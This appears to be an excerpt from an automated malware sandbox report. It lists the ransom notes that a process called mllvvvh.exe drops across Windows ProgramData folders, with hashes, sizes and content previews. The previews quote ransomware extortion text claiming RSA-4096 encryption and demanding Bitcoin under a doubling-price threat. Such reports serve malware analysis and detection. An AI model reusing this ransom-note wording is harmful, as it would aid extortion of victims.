                  C:\ProgramData\Microsoft\Search\Data\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Search\Data\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Search\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Settings\Accounts\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Settings\Accounts\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Settings\Accounts\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Settings\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Settings\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Settings\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\SmsRouter\MessageStore\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\SmsRouter\MessageStore\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\SmsRouter\MessageStore\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\SmsRouter\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\SmsRouter\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\SmsRouter\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Spectrum\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
